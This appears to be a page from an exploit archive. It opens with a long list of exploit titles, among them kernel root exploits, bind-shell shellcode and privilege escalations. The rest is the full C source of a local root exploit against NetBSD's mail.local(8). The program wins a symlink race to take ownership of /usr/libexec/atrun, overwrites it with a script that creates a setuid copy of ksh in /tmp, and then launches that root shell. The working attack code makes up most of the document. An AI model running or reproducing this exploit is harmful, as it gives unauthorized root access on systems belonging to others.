be496c36bc
3 new exploits Mandrake Linux 8.2 - /usr/mail Local Exploit /usr/mail (Mandrake Linux 8.2) - Local Exploit Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Root Exploit (3) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3) Linux Kernel 2.2 - (TCP/IP Weakness) Exploit Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit CDRecord's ReadCD - Local Root Privileges CDRecord's ReadCD - Local Root Exploit NetBSD FTPd / tnftpd Remote Stack Overflow PoC NetBSD FTPd / Tnftpd - Remote Stack Overflow PoC Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1) Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' ring0 Root Exploit (1) Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (1) Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1) SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities SimpNews <= 2.16.2 - Multiple SQL Injection Vulnerabilities NetBSD 5.0 and below Hack GENOCIDE Environment Overflow proof of concept NetBSD 5.0 and below Hack PATH Environment Overflow proof of concept NetBSD <= 5.0 - Hack GENOCIDE Environment Overflow proof of concept NetBSD <= 5.0 - Hack PATH Environment Overflow proof of concept Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (2) Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2) Linux Kernel < 2.6.34 (Ubuntu 10.10) - CAP_SYS_ADMIN x86 Local Privilege Escalation Exploit (1) Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (1) Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2) Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (2) Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Info Leak Exploit Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) - Exploit NetBSD <= 1.4_OpenBSD <= 2.5_Solaris <= 7.0 profil(2) NetBSD <= 1.4 / OpenBSD <= 2.5 /Solaris <= 7.0 profil(2) - Exploit FreeBSD 3.4/4.0/5.0_NetBSD 1.4 Unaligned IP Option Denial of Service FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow NetBSD 1.x TalkD User Validation NetBSD 1.x TalkD - User Validation FreeBSD 4.x_NetBSD 1.4.x/1.5.x/1.6_OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition Linux Kernel 2.4 - execve() System Call Race Condition PoC Linux Kernel 2.4 - suid execve() System Call Race Condition PoC Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index PoC (1) Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1) Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2) Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Local Root Exploit (2) NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow OpenBSD 4.6 and NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3) Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3) Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption Mozilla Firefox SeaMonkey <= 3.6.10 / Thunderbird <= 3.1.4 - 'document.write' Memory Corruption Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities Linux Kernel <= 3.14.5 (RHEL/CentOS 7) - libfutex Local Root Linux Kernel <= 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow VSAT Sailor 900 - Remote Exploit Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept) Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - rootpipe Local Privilege Escalation Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation Apple OS X Entitlements Rootpipe Privilege Escalation Apple OS X Entitlements - 'Rootpipe' Privilege Escalation OS-X/x86-64 - /bin/sh Shellcode - NULL Byte Free (34 bytes) OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes) OS X Install.framework suid root Runner Binary Privilege Escalation OS X Install.framework - suid root Runner Binary Privilege Escalation Linux/MIPS Kernel 2.6.36 NetUSB - Remote Code Execution Exploit Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution Exploit Linux/x86-64 - bindshell (Pori: 5600) shellcode (81 bytes) Linux/x86-64 - bindshell (Port 5600) shellcode (81 bytes) Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Local Root Exploit Exim 4 (Debian/Ubuntu) - Spool Local Root Privilege Escalation Exim 4 (Debian / Ubuntu) - Spool Local Privilege Escalation Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032) Windows 7-10 and 2008-2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051) Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051) Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes) Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes) mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006) Apache 2.4.7 & PHP <= 7.0.2 - openssl_seal() Uninitialized Memory Code Execution
220 lines
No EOL
6 KiB
C
Executable file
220 lines
No EOL
6 KiB
C
Executable file
// Source: http://akat1.pl/?id=2
|
|
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <fcntl.h>
|
|
#include <signal.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <err.h>
|
|
#include <sys/wait.h>
|
|
|
|
#define ATRUNPATH "/usr/libexec/atrun"
|
|
#define MAILDIR "/var/mail"
|
|
|
|
static int
|
|
overwrite_atrun(void)
|
|
{
|
|
char *script = "#! /bin/sh\n"
|
|
"cp /bin/ksh /tmp/ksh\n"
|
|
"chmod +s /tmp/ksh\n";
|
|
size_t size;
|
|
FILE *fh;
|
|
int rv = 0;
|
|
|
|
fh = fopen(ATRUNPATH, "wb");
|
|
|
|
if (fh == NULL) {
|
|
rv = -1;
|
|
goto out;
|
|
}
|
|
|
|
size = strlen(script);
|
|
if (size != fwrite(script, 1, strlen(script), fh)) {
|
|
rv = -1;
|
|
goto out;
|
|
}
|
|
|
|
out:
|
|
if (fh != NULL && fclose(fh) != 0)
|
|
rv = -1;
|
|
|
|
return rv;
|
|
}
|
|
|
|
static int
|
|
copy_file(const char *from, const char *dest, int create)
|
|
{
|
|
char buf[1024];
|
|
FILE *in = NULL, *out = NULL;
|
|
size_t size;
|
|
int rv = 0, fd;
|
|
|
|
in = fopen(from, "rb");
|
|
if (create == 0)
|
|
out = fopen(dest, "wb");
|
|
else {
|
|
fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR |
|
|
S_IWUSR);
|
|
if (fd == -1) {
|
|
rv = -1;
|
|
goto out;
|
|
}
|
|
out = fdopen(fd, "wb");
|
|
}
|
|
|
|
if (in == NULL || out == NULL) {
|
|
rv = -1;
|
|
goto out;
|
|
}
|
|
|
|
while ((size = fread(&buf, 1, sizeof(buf), in)) > 0) {
|
|
if (fwrite(&buf, 1, size, in) != 0) {
|
|
rv = -1;
|
|
goto out;
|
|
}
|
|
}
|
|
|
|
out:
|
|
if (in != NULL && fclose(in) != 0)
|
|
rv = -1;
|
|
if (out != NULL && fclose(out) != 0)
|
|
rv = -1;
|
|
|
|
return rv;
|
|
}
|
|
|
|
int
|
|
main()
|
|
{
|
|
pid_t pid;
|
|
uid_t uid;
|
|
struct stat sb;
|
|
char *login, *mailbox, *mailbox_backup = NULL, *atrun_backup, *buf;
|
|
|
|
umask(0077);
|
|
|
|
login = getlogin();
|
|
|
|
if (login == NULL)
|
|
err(EXIT_FAILURE, "who are you?");
|
|
|
|
uid = getuid();
|
|
|
|
asprintf(&mailbox, MAILDIR "/%s", login);
|
|
|
|
if (mailbox == NULL)
|
|
err(EXIT_FAILURE, NULL);
|
|
|
|
if (access(mailbox, F_OK) != -1) {
|
|
/* backup mailbox */
|
|
asprintf(&mailbox_backup, "/tmp/%s", login);
|
|
if (mailbox_backup == NULL)
|
|
err(EXIT_FAILURE, NULL);
|
|
}
|
|
|
|
if (mailbox_backup != NULL) {
|
|
fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox,
|
|
mailbox_backup);
|
|
|
|
if (copy_file(mailbox, mailbox_backup, 1))
|
|
err(EXIT_FAILURE, "[-] failed");
|
|
}
|
|
|
|
/* backup atrun(1) */
|
|
atrun_backup = strdup("/tmp/atrun");
|
|
if (atrun_backup == NULL)
|
|
err(EXIT_FAILURE, NULL);
|
|
|
|
fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH,
|
|
atrun_backup);
|
|
|
|
if (copy_file(ATRUNPATH, atrun_backup, 1))
|
|
err(EXIT_FAILURE, "[-] failed");
|
|
|
|
/* win the race */
|
|
fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);
|
|
|
|
switch (pid = fork()) {
|
|
case -1:
|
|
err(EXIT_FAILURE, NULL);
|
|
/* NOTREACHED */
|
|
|
|
case 0:
|
|
asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
|
|
"2> /dev/null", login);
|
|
|
|
for(;;)
|
|
system(buf);
|
|
/* NOTREACHED */
|
|
|
|
default:
|
|
umask(0022);
|
|
for(;;) {
|
|
int fd;
|
|
unlink(mailbox);
|
|
symlink(ATRUNPATH, mailbox);
|
|
sync();
|
|
unlink(mailbox);
|
|
fd = open(mailbox, O_CREAT, S_IRUSR | S_IWUSR);
|
|
close(fd);
|
|
sync();
|
|
if (lstat(ATRUNPATH, &sb) == 0) {
|
|
if (sb.st_uid == uid) {
|
|
kill(pid, 9);
|
|
fprintf(stderr, "[+] won race!\n");
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
break;
|
|
}
|
|
(void)waitpid(pid, NULL, 0);
|
|
|
|
if (mailbox_backup != NULL) {
|
|
/* restore mailbox */
|
|
fprintf(stderr, "[+] restore mailbox %s to %s\n",
|
|
mailbox_backup, mailbox);
|
|
|
|
if (copy_file(mailbox_backup, mailbox, 0))
|
|
err(EXIT_FAILURE, "[-] failed");
|
|
if (unlink(mailbox_backup) != 0)
|
|
err(EXIT_FAILURE, "[-] failed");
|
|
}
|
|
|
|
/* overwrite atrun */
|
|
fprintf(stderr, "[+] overwriting atrun(1)\n");
|
|
|
|
if (chmod(ATRUNPATH, 0755) != 0)
|
|
err(EXIT_FAILURE, NULL);
|
|
|
|
if (overwrite_atrun())
|
|
err(EXIT_FAILURE, NULL);
|
|
|
|
fprintf(stderr, "[+] waiting for atrun(1) execution...\n");
|
|
|
|
for(;;sleep(1)) {
|
|
if (access("/tmp/ksh", F_OK) != -1)
|
|
break;
|
|
}
|
|
|
|
/* restore atrun */
|
|
fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup,
|
|
ATRUNPATH);
|
|
|
|
if (copy_file(atrun_backup, ATRUNPATH, 0))
|
|
err(EXIT_FAILURE, "[-] failed");
|
|
if (unlink(atrun_backup) != 0)
|
|
err(EXIT_FAILURE, "[-] failed");
|
|
|
|
if (chmod(ATRUNPATH, 0555) != 0)
|
|
err(EXIT_FAILURE, NULL);
|
|
|
|
fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
|
|
"ownership.\n");
|
|
fprintf(stderr, "Enjoy your shell:\n");
|
|
|
|
execl("/tmp/ksh", "ksh", NULL);
|
|
|
|
return 0;
|
|
} |